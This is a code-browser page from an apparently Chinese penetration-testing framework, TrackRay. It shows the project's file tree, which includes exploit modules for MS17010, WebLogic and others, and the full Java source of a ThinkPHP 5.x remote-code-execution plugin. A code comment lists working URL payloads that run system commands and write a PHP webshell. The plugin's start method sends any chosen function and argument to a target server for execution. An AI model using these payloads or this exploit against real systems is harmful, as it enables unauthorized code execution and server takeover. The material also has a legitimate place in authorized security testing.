java source code of Thinkphp5RCE

TrackRay-master
- web
  - src
    - main
      - resources
        trackray-web-application.xml
        trackray-base-framework.xml
        trackray-moudle-application.xml
        templates
        socket.html
        msf.html
        manage
        footer_script.html
        topbar.html
        task.html
        mvcplugin.html
        view.html
        create.html
        footer.html
        header.html
        menu.html
        index.html
        api.html
        login.html
        index.html
        banner.txt
        application.properties
        static
        js
        bootstrap.min.js
        jquery-2.1.1.min.js
        json.js
        css
        bootstrap-reboot.css
        bootstrap.min.css
        bootstrap.css
        bootstrap-reboot.min.css
        bootstrap-grid.css
        bootstrap-grid.min.css
        assets
        images
        startman.svg
        bg-auth.jpg
        file-searching.svg
        small
        small-2.jpg
        small-4.jpg
        small-3.jpg
        small-1.jpg
        favicon.ico
        projects
        project-4.jpg
        project-1.jpg
        project-2.jpg
        project-3.jpg
        bg-pattern-light.svg
        users
        avatar-1.jpg
        1557203662(1).jpg
        help-icon.svg
        mail_sent.svg
        report.svg
        products
        product-4.jpg
        product-1.jpg
        product-3.jpg
        product-2.jpg
        product-5.jpg
        product-6.jpg
        maintenance.svg
        payments
        flags
        us.jpg
        italy.jpg
        germany.jpg
        spain.jpg
        russia.jpg
        email-campaign.svg
        fonts
        Nunito-Bold.woff
        dripicons-v2.woff
        Nunito-SemiBold.woff
        Nunito-Regular.woff
        materialdesignicons-webfont.woff2
        summernote.woff
        summernote.ttf
        js
        pages
        demo.dashboard.js
        demo.apex-sparklines.js
        demo.widgets.js
        demo.vector-maps.js
        demo.apex-scatter.js
        demo.customers.js
        demo.apex-line.js
        demo.profile.js
        demo.project-detail.js
        demo.apex-heatmap.js
        demo.chartjs.js
        demo.apex-column.js
        demo.summernote.js
        demo.products.js
        demo.google-maps.js
        demo.datatable-init.js
        demo.simplemde.js
        demo.apex-pie.js
        demo.calendar.js
        demo.typehead.js
        demo.apex-mixed.js
        demo.apex-candlestick.js
        demo.sparkline.js
        demo.toastr.js
        demo.apex-bar.js
        demo.apex-bubble.js
        demo.sellers.js
        demo.britechart.js
        demo.dashboard-projects.js
        demo.apex-radialbar.js
        demo.dashboard-crm.js
        demo.apex-area.js
        demo.form-wizard.js
        demo.apex-radar.js
        ui
        component.dragula.js
        component.todo.js
        component.fileupload.js
        component.chat.js
        vendor
        jquery-jvectormap-1.2.2.min.js
        summernote-bs4.min.js
        dataTables.bootstrap4.js
        dataTables.checkboxes.min.js
        jquery-jvectormap-in-mill-en.js
        handlebars.min.js
        dropzone.min.js
        gmaps.min.js
        responsive.bootstrap4.min.js
        dataTables.select.min.js
        jquery-jvectormap-us-il-chicago-mill-en.js
        buttons.html5.min.js
        dataTables.buttons.min.js
        buttons.bootstrap4.min.js
        jquery-jvectormap-us-merc-en.js
        dataTables.keyTable.min.js
        jquery-jvectormap-au-mill-en.js
        buttons.flash.min.js
        jquery.dataTables.min.js
        buttons.print.min.js
        dataTables.responsive.min.js
        jquery-jvectormap-world-mill-en.js
        typeahead.bundle.min.js
        jquery.sparkline.min.js
        dragula.min.js
        css
        icons.min.css
        vendor
        simplemde.min.css
        buttons.bootstrap4.css
        jquery-jvectormap-1.2.2.css
        dataTables.bootstrap4.css
        summernote-bs4.css
        responsive.bootstrap4.css
        britecharts.min.css
        select.bootstrap4.css
        fullcalendar.min.css
      - java
        com
        trackray
        web
        dto
        TaskDTO.java
        utils
        ServletUtils.java
        wagu
        Block.java
        Board.java
        Table.java
        Charr.java
        api
        PluginApi.java
        TaskApi.java
        HtmlController.java
        module
        TaskData.java
        query
        TaskQuery.java
        Query.java
        VulnQuery.java
        config
        FreemarkerConfig.java
        QuartzConfig.java
        WebConfigurer.java
        XmlConfig.java
        WebSocketConfig.java
        service
        impl
        PluginServiceImpl.java
        TaskServiceImpl.java
        TaskService.java
        PluginService.java
        handle
        ThreadMonitorREST.java
        ScannerJob.java
        interceptor
        LoginInterceptor.java
        repository
        TaskRepository.java
        ws
        HandshakeInterceptor.java
        PluginHandler.java
        MsfHandler.java
        WebApplication.java
  - pom.xml
- pom.xml
- plugin
  - src
    - main
      - resources
        templates
        helloworld
        index.html
      - java
        com
        trackray
        module
        mvc
        HelloWorld.java
  - pom.xml
- LICENSE
- base
  - src
    - main
      - java
        com
        trackray
        base
        configuration
        TrackrayConfiguration.java
        MSFConfiguration.java
        AWVSConfiguration.java
        XRayConfiguration.java
        BurpSuiteConfiguration.java
        ExtensionsConfiguration.java
        utils
        PropertyUtil.java
        CheckUtils.java
        DomainUtils.java
        RegexUtil.java
        TaskUtils.java
        SysLog.java
        Message.java
        StrUtils.java
        MD5.java
        ReUtils.java
        HtmlUtils.java
        IOUtils.java
        ExtractUtils.java
        PageUtils.java
        TemplateUtils.java
        exploit
        Exploter.java
        entity
        PortEntity.java
        SystemEntity.java
        stream
        PluginDataOutputStream.java
        WebsocketOutputStream.java
        attack
        HackKit.java
        XRay.java
        Awvs.java
        Metasploit.java
        Payload.java
        Python.java
        burpsuite
        pojo
        configuration
        SslPassThrough.java
        ByStatusCode.java
        Proxy.java
        ByFileExtension.java
        UpstreamProxy.java
        Redirections.java
        ByFolders.java
        ProjectOptions.java
        Sequencer.java
        Responses.java
        CookieJar.java
        Filter.java
        WebSocketsHistoryDisplayFilter.java
        Connections.java
        CollaboratorServer.java
        Actions.java
        Status100Responses.java
        SessionHandlingRules.java
        ByAnnotation.java
        ProxyServer.java
        RequestListeners.java
        Miscellaneous.java
        Rules.java
        MatchReplaceRules.java
        Target.java
        BurpConfig.java
        Scope.java
        ScheduledTasks.java
        Logging.java
        LiveCapture.java
        HttpHistoryDisplayFilter.java
        ByMimeType.java
        ByRequestType.java
        InterceptServerResponses.java
        TokenHandling.java
        InterceptClientRequests.java
        Http.java
        OutOfScopeRequests.java
        Ssl.java
        Repeater.java
        PlatformAuthentication.java
        ByListener.java
        ClientCertificates.java
        StreamingResponses.java
        Misc.java
        BySearch.java
        Timeouts.java
        SocksProxy.java
        InterceptWebSocketsMessages.java
        TokenAnalysis.java
        ResponseModification.java
        Macros.java
        Sessions.java
        Requests.java
        Negotiation.java
        history
        BurpProxyHistory.java
        Messages.java
        BurpSuite.java
        plugin
        CommonPlugin.java
        AbstractPOC.java
        InnerPlugin.java
        CrawlerPlugin.java
        WebSocketPlugin.java
        AbstractExploit.java
        AbstractPlugin.java
        MVCPlugin.java
        enums
        WEBServer.java
        VulnType.java
        Package.java
        SystemOS.java
        FingerPrint.java
        VulnLevel.java
        Language.java
        HttpMethod.java
        store
        VulnRepository.java
        VulnDTO.java
        SettingDTO.java
        SettingRepository.java
        httpclient
        HttpProxy.java
        CrawlerPage.java
        HttpClient.java
        ResponseStatus.java
        Response.java
        Fetcher.java
        Request.java
        HttpClientWrapper.java
        handle
        ModuleClassLoader.java
        CoreThreadMap.java
        ThreadMonitor.java
        MyClassLoader.java
        SystemInit.java
        Shell.java
        quartz
        SpringJobFactory.java
        QuartzManager.java
        annotation
        Exploit.java
        Rule.java
        Function.java
        Plugin.java
        Param.java
        Option.java
        bean
        Banner.java
        SystemInfo.java
        HostInfo.java
        Assets.java
        FingerBean.java
        Constant.java
        Task.java
        Rule.java
        Result.java
        ResultCode.java
        SenseInfo.java
        Vulnerable.java
        controller
        DispatchController.java
    - test
      - java
        Test.java
  - pom.xml
- module
  - src
    - main
      - resources
        templates
        loggerApp
        index.html
        burpsuite
        option.html
        history.html
        open.html
        index.html
        sqlmapApp
        index.html
        common
        error.html
        setting.html
        default.html
        uploadFuzz
        index.html
        kunpengScan
        index.html
        nmapScanner
        index.html
        gpsLocation
        generate.html
        result.html
        index.html
        ie11XXE
        index.html
        ceye
        index.html
        ysoserial
        index.html
        json
        result.html
        index.html
        codeAudit
        view.html
        index.html
        javaDecompile
        result.html
        index.html
        mindMap
        mind.html
        index.html
        xrayScan
        passive.html
        crawler.html
        index.html
        static
        mindMap
        icons
        src
        backend.image.js
        backend.webdav.js
        format.js
        shape.js
        ui.help.js
        item.js
        format.plaintext.js
        promise-addons.js
        shape.underline.js
        map.js
        command.js
        ui.value.js
        ui.js
        layout.graph.js
        backend.local.js
        mm.js
        ui.backend.image.js
        backend.file.js
        format.json.js
        keyboard.js
        mouse.js
        ui.backend.webdav.js
        ui.shape.js
        ui.io.js
        app.js
        ui.backend.js
        backend.firebase.js
        format.freemind.js
        ui.backend.local.js
        promise.js
        ui.backend.gdrive.js
        action.js
        format.mma.js
        ui.layout.js
        format.mup.js
        layout.map.js
        ui.backend.file.js
        backend.gdrive.js
        shape.ellipse.js
        ui.backend.firebase.js
        ui.color.js
        command.edit.js
        repo.js
        layout.js
        ui.icon.js
        shape.box.js
        clipboard.js
        command.select.js
        menu.js
        ui.status.js
        layout.tree.js
        backend.js
        tip.js
        logo
        logo.svg
        examples
        features.mymind
        Goldfish.mymind
        my-mind.js
        css
        ui.css
        font.css
        style.css
        menu.css
        shape.css
        item.css
        print.css
        throbber.gif
      - java
        com
        trackray
        module
        mvc
        CrawlergoApp.java
        JavaDecompile.java
        BurpSuiteApp.java
        Ceye.java
        KunpengScan.java
        XRayScan.java
        LoggerApp.java
        SQLMapApp.java
        IE11XXE.java
        CodeAuditApp.java
        lightSaber
        LightSaberApp.java
        Ysoserial.java
        mindMap
        MindMap.java
        MindMapRepository.java
        MindMapData.java
        nmap
        NmapScanner.java
        NmapRepository.java
        NmapData.java
        UploadFuzzApp.java
        gps
        GPSRepository.java
        GpsData.java
        GPSLocation.java
        inner
        FuckCrawler.java
        SgkSearch.java
        SQLMapInner.java
        FuckChildDomain.java
        YsoserialGenerate.java
        FuckBroDomain.java
        Nmap.java
        NmapInner.java
        FuckAwvs.java
        SimpleVulRule.java
        FuckCeye.java
        FuckCrawlergo.java
        XRayInner.java
        JSONInner.java
        FuckIPinfo.java
        XunfengInner.java
        CrawlergoInner.java
        FuckWhois.java
        JSONPlugin.java
        codeAudit
        Rule.java
        Vuln.java
        CodeVulnRepository.java
        CodeAuditInner.java
        AwvsScan.java
        UploadFuzzInner.java
        FuckPassword.java
        FingerScan.java
        FuzzDir.java
        FuckCDN.java
        plugin
        ios
        iPhoneDOS.java
        iPhoneDOS2.java
        windows
        smb
        MS17010.java
        rdp
        MS12020.java
        server
        weblogic
        WeblogicAsyncResponseServiceRCE.java
        SeleniumServerRCE.java
        webapp
        fckeditor
        FckeditorGetshell.java
        ecshop
        ECShop002.java
        ECShop001.java
        typecho
        Typecho001.java
        spring
        SpringCloudServerConfigFileRead.java
        phpmyadmin
        PHPMyAdmin001.java
        phpcms
        PHPcms2008rce.java
        jcms
        JPhotoSetupBypass.java
        PasswordRead.java
        wordpress
        Wordpress001.java
        Wordpress002.java
        thinkphp
        Thinkphp51and52RCE.java
        Thinkphp5xRCE2.java
        Thinkphp5RCE.java
        dedecms
        DedeFindManage.java
        confluence
        ConfluenceServerRCE.java
        crawler
        FileParse.java
        LoginFormLeak.java
        URLLoctionByCrawler.java
        ListDir.java
        InfoProbe.java
        SQLErrorCrawler.java
        SQLinjectionByCrawler.java
        XssByCrawler.java
        Struts2Crawler.java
        FingerProbe.java
        XRayCrawler.java
        Verify.java
        poc
        WeblogicFuzz.java
        WindowsRdp.java
        HttpSysRCE.java
        DiscuzRealPathLeak.java
        FuckTheWebsiteEverything.java
        SgkExploit.java
        WebLogicWLSRCE.java
        auxiliary
        PyScript.java
        NetCat.java
        PowerUpDownload.java
        AssetsScan.java
        SgkPlugin.java
        Msf.java
        PythonPlugin.java
        Crawlergo.java
        GenPassword.java
        CrackPassword.java
        NmapScan.java
        DownloadYsoserialPayload.java
        Xunfeng.java
        XRaylog.java
  - pom.xml
- release
  - readme.txt
- README.md
- Dockerfile
- docs
  - img
    - 1565838152.jpg
    - 1565838022.jpg
    - console.jpg

package com.trackray.module.plugin.webapp.thinkphp;

import com.trackray.base.annotation.Plugin;
import com.trackray.base.annotation.Param;
import com.trackray.base.annotation.Rule;
import com.trackray.base.httpclient.*;
import com.trackray.base.plugin.AbstractPlugin;
import com.trackray.base.plugin.CommonPlugin;
import com.trackray.base.utils.PageUtils;
import org.apache.commons.lang.StringUtils;
import org.apache.http.HttpException;

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

@Plugin(title = "Thinkphp <= 5.1 远程代码执行漏洞" ,link = "https://www.t00ls.net/thread-48931-1-1.html", author = "浅蓝")
@Rule(params = {
                @Param(key = "target", desc = "目标地址"),
                @Param(key = "func",defaultValue = "phpinfo" , desc = "执行函数"),
                @Param(key = "var",defaultValue = "1" , desc = "函数参数"),
                },type = CommonPlugin.Type.HTML )
public class Thinkphp5RCE extends CommonPlugin<String>{
    /** 5.1
     * s=index/\think\Request/input&filter=phpinfo&data=1

     * s=index/\think\Request/input&filter=system&data=id

     * s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

     * s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

     * s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

     * s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
     * */

    private static String payload = "/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1";
    private String target;
    private List<String> r = new ArrayList<>();
    @Override
    public boolean check(Map<String, Object> param) {
        target = param.get("target").toString();
        crawlerPage.getRequest().setUrl(target.concat(payload));
        fetcher.run(crawlerPage);
        String text = crawlerPage.getResponse().getStatus().getContentString();
        if (StringUtils.contains(text,"PHP Version"))
        {
            r.add("存在漏洞"+target.concat(payload));
            return true;
        }
        return false;
    }

    @Override
    public String start() {
        if (param.containsKey("method") && param.containsKey("param")){
            String exp ="/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]="+param.get("method")+"&vars[1][]="+param.get("param");
            crawlerPage.getRequest().setUrl(target.concat(exp));
            fetcher.run(crawlerPage);
            r.add(PageUtils.getContent(crawlerPage));
        }

        return r.toString();
    }

    @Override
    public void after() {
        if (result!=null){
            System.out.print("[+]");
            System.out.println(target);
        }
    }

}